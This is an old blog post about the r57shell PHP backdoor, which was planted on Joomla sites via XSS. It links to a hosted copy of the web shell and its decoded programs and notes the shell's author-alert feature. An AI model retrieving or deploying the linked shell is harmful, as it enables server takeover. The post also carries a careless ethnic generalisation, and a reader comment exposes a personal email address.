Joomla, XSS and Obfuscated Code
Hello again,
Yesterday, our chief engineer Ben, came about an interesting backdoor php script that a friend off irc was talking about. He was studying the joomla source, prior to implementation, and found that tons of joomla sites had been owned with a XSS used to load the r57shell php script.
We've included a copy of the script here for educational purposes: http://www.projectskyline.com/phplist/r57shell.txt
Ben went and posted this information to the NYPHPlist to provide fellow developers
an insight into the tools crackers are using against us.
A member of the PHPList pointed out that the script has some backdoor, author alerting features: http://seclists.org/fulldisclosure/2006/Sep/0083.html
Ben decided to base64_decode( ) the obfuscated variables and see what kinds of programs the
shellscript was building and executing.
The first section of code is that of the author alert...this provides the author w/the ip of the owned machine.
Ben then went ahead and decode the programs...a link to them is here:
http://www.projectskyline.com/phplist/test.php
Can't trust those russians!
- psl
Labels: ben sgro, crackers, ny php list, php, ProjectSkyLine
posted by ProjectSkyLine @ Friday, June 29, 2007
1 Comments
1 Comments:
Hello,
I frequent a forum that is being continously hack by this r57 shell script, and I was wonder if you knew how to secure the box that is being hack to prevent this from happening again. If you do, please shoot me an email amin.kardan@gmail.com
Post a Comment
<< Home